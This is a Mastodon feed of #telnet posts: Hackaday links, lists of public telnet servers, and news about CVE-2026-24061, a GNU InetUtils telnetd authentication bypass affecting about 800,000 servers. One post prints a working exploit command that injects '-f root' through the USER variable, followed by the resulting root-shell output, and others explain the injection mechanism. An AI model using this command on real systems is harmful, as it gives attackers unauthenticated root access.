New rule!
If you want to put something live on the internet then you have to pass some sort of basic proficiency/intelligence/common sense test first.
So decreed on this 4th day of February in the year of our Lord 2026.
#TELNET
Hackaday Links: February 1, 2026
https://fed.brid.gy/r/https://hackaday.com/2026/02/01/hackaday-links-february-1-2026/
![<div><img alt="Hackaday Links Column Banner" class="attachment-large size-large wp-post-image" height="430" src="https://hackaday.com/wp-content/uploads/2014/11/had-links-banner.jpg?w=800" style="margin: 0 auto; margin-bottom: 15px;" width="800" /></div><p>For many readers, more snow is the last thing they want to see right now…but what if it <a href="https://potch.me/2026/snow-simulation-toy.html" target="_blank">comes in the form of an online simulator</a> in the style of an old DOS game? Created by [Potch], it works like one of those “falling sand” simulators, with sliders that let you control various elements of the wintry action. For more a immersive experience, open the window and let some cold air in while you play.</p>
<p>If those old school graphics have you yearning for a simpler time, then you’ll love <a href="https://telnet.org/htm/places.htm" target="_blank"><em>Places to Telnet</em></a>, a page on the very slick CRT-themed telnet.org that lists servers you can connect to. The list is made up primarily of games, but there’s also systems you can call up to do things like show the weather or browse Wikipedia. They even take submissions, so if you know any interesting destinations that aren’t on the list, make sure to share with the class.</p>
<p>Our ability to make and use tools is one of the things that separates us from the rest of the animal kingdom, and is an ability not often seen outside of primates. But a recent paper in <](https://files.mastodon.social/cache/media_attachments/files/115/998/748/878/686/051/original/84622fc4db91c7d9.jpg)
Hackaday Links: February 1, 2026 https://hackaday.com/2026/02/01/hackaday-links-february-1-2026/
#HackadayColumns #Hackadaylinks #Animalintelligence #Artemis #BelkinWeMo #Nasa #Snow #Spacetourism #Telnet #WeMo
800K Linux servers with a Telnet vulnerability. Unless you need it to talk to some legacy systems, turn Telnet off, it's 2026.
Critical Linux Warning: 800,000 Devices are EXPOSED!
Watch the video on YouTube: https://youtu.be/81fq__6a1FQ?si=drEHgLjjMj7MO9VF
#Telnet-Sicherheitslücke: Wegen kritischen Risikos patchen | Security https://www.heise.de/news/Kritische-telnetd-Luecke-Patchen-aber-Panik-ist-unbegruendet-11155419.html #Patchday #telnetd #OpenSource
Nearly 800,000 #Telnet servers exposed to remote attacks
The security flaw (CVE-2026-24061) already has a proof-of-concept exploit, impacts GNU InetUtils versions 1.9.3 (released in 2015) through 2.7, and was patched in version 2.8 (released on January 20).
Places to Telnet | telnet.org
"The text based internet can be exciting, informative, and fun. Using telnet, you can access a variety of these resources on the internet. Below you’ll find lists of a few places to get you started."
https://telnet.org/htm/places.htm
#telnet #tui
Warning: computer nerd stuff below:
So. In 2026, telnet is still a thing.
Really? 😑
ubuntu@ubuntu:~$ USER=“-f root” telnet -a victim.ip.address
[usual Ubuntu /etc/issue text]
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)
You’re welcome.
🚨 Critical #Telnet Authentication Bypass Vulnerability Discovered #CVE202624061 #cybersecurity #infosec #DevOps #security
🔓 #GNU Inetutils telnetd through version 2.7 allows remote authentication bypass via "-f root" USER environment variable
⚡ The exploit is shockingly simple: attackers send "-f root" as the USER value, triggering /usr/bin/login -f root which skips password authentication entirely
🧵 👇
🎯 Nearly 800,000 #Telnet servers potentially affected worldwide running vulnerable GNU inet utils implementations
📅 Bug existed since 2015 code changes, finally patched January 20, 2026 in version 2.8
🔧 The flaw stems from missing input sanitization: USER environment variable from network is passed unsanitized to login command, allowing flag injection
📢 Exploitation en cours d’une faille critique dans GNU InetUtils telnetd; Shadowserver suit ~800 000 IP Telnet
📝 Selon Shadowserver, un organisme de veille...
📖 cyberveille : https://cyberveille.ch/posts/2026-01-26-exploitation-en-cours-dune-faille-critique-dans-gnu-inetutils-telnetd-shadowserver-suit-800-000-ip-telnet/
🌐 source : https://www.bleepingcomputer.com/news/security/nearly-800-000-telnet-servers-exposed-to-remote-attacks/
#GNU_InetUtils_telnetd #Telnet #Cyberveille
The orange site shared this link, telnet.org which has a list of servers to which you can connect over Telnet. (Warning: these are always unencrypted connections).
If you want a Telnet-like experience but over a secure #TLS connection (e.g. using an #SSH client), check out the “Tildeverse,” https://tildeverse.org/ , a list of public-access servers with SSH login. It is like the #Fediverse but using TLS rather than the #ActivityPub protocol. The obvious drawback is that you need to know how to use a command line, but I doubt that would bother most Fediverse dwellers.
@screwlisp I didn’t see https://lambda.moo.mud.org at all in this list of Telnet logins. We may need to do something about that.
Nearly 800,000 #Telnet servers exposed to remote attacks
A list of fun destinations for telnet
https://telnet.org/htm/places.htm
#ycombinator #telnet #telnet_places #telnet_destinations #telnet_servers
“the Telnet IAC option negotiation to inject 'USER=-f <user>' and grant attackers' shell access to compromised devices without authentication.”
Nearly 800,000 Telnet servers exposed to remote attacks https://www.bleepingcomputer.com/news/security/nearly-800-000-telnet-servers-exposed-to-remote-attacks/
Client Info
Server: https://mastodon.social
Version: 2025.07
Repository: https://github.com/cyevgeniy/lmst